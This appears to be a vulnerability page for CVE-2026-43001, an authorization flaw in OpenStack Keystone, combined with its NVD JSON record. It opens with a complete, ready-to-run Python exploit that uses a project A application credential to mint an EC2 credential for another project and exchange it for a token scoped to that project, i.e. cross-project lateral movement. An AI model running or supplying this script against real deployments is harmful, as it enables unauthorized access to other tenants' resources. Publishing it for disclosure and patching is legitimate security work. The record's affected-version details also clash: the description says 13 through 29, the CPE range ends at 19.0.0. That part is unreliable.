CVE-2026-43001

import requests import json # Configuration KEYSTONE_URL = "https://<keystone_host>:5000" APP_CRED_ID = "<app_credential_id>" APP_CRED_SECRET = "<app_credential_secret>" TARGET_PROJECT_ID = "<target_project_b_id>" # The attacker wants to access this project # Step 1: Authenticate using Application Credential for Project A # to get a scoped token for Project A auth_url = f"{KEYSTONE_URL}/v3/auth/tokens" auth_data = { "auth": { "identity": { "methods": ["application_credential"], "application_credential": { "id": APP_CRED_ID, "secret": APP_CRED_SECRET } } } } headers = {'Content-Type': 'application/json'} response = requests.post(auth_url, json=auth_data, headers=headers, verify=False) if response.status_code != 201: print("Failed to authenticate with App Credential") exit(1) project_a_token = response.headers['X-Subject-Token'] print(f"Got token for Project A: {project_a_token[:20]}...") # Step 2: Exploit the vulnerability - Create EC2 Credential for Project B # using the token from Project A ec2_create_url = f"{KEYSTONE_URL}/v3/credentials" ec2_payload = { "credential": { "type": "ec2", "blob": {}, "project_id": TARGET_PROJECT_ID # VULNERABILITY: ID is not validated against token's project } } ec2_headers = { 'X-Auth-Token': project_a_token, 'Content-Type': 'application/json' } ec2_response = requests.post(ec2_create_url, json=ec2_payload, headers=ec2_headers, verify=False) if ec2_response.status_code == 201: ec2_cred_data = ec2_response.json()['credential'] access = ec2_cred_data['blob']['access'] secret = ec2_cred_data['blob']['secret'] print(f"Successfully created EC2 Cred for Project B! Access: {access}") # Step 3: Exchange EC2 Credential for a Token scoped to Project B ec2tokens_url = f"{KEYSTONE_URL}/v3/ec2tokens" ec2_auth_payload = { "auth": { "identity": { "methods": ["ec2credential"], "ec2credential": { "access": access, "secret": secret } } } } token_response = requests.post(ec2tokens_url, json=ec2_auth_payload, headers=headers, verify=False) if token_response.status_code == 201: project_b_token = token_response.headers['X-Subject-Token'] token_body = token_response.json()['token'] print(f"Got token scoped to Project: {token_body['project']['id']}") if token_body['project']['id'] == TARGET_PROJECT_ID: print("[+] Exploit successful! Lateral movement achieved.") else: print("Failed to exchange EC2 token.") else: print(f"Failed to create EC2 credential: {ec2_response.text}")

{"cve": {"id": "CVE-2026-43001", "sourceIdentifier": "[email protected]", "published": "2026-05-01T09:16:17.273", "lastModified": "2026-05-04T18:25:50.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in OpenStack Keystone 13 through 29. POST /v3/credentials did not validate that the caller-supplied project_id for an EC2-type credential matched the project of the authenticating application credential. This allowed an attacker holding an unrestricted application credential for project A to create an EC2 credential targeting project B; a subsequent /v3/ec2tokens exchange would then issue a Keystone token scoped to project B while still carrying the original app_cred_id, enabling cross-project lateral movement within the credential owner's role footprint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L", "baseScore": 7.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openstack:keystone:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0", "versionEndIncluding": "19.0.0", "matchCriteriaId": "15A2E255-7303-4B2E-8970-0A3E4B40F9BA"}]}]}], "references": [{"url": "https://bugs.launchpad.net/keystone/+bug/2149775", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://review.opendev.org/c/openstack/keystone/+/985804", "source": "[email protected]", "tags": ["Patch"]}]}}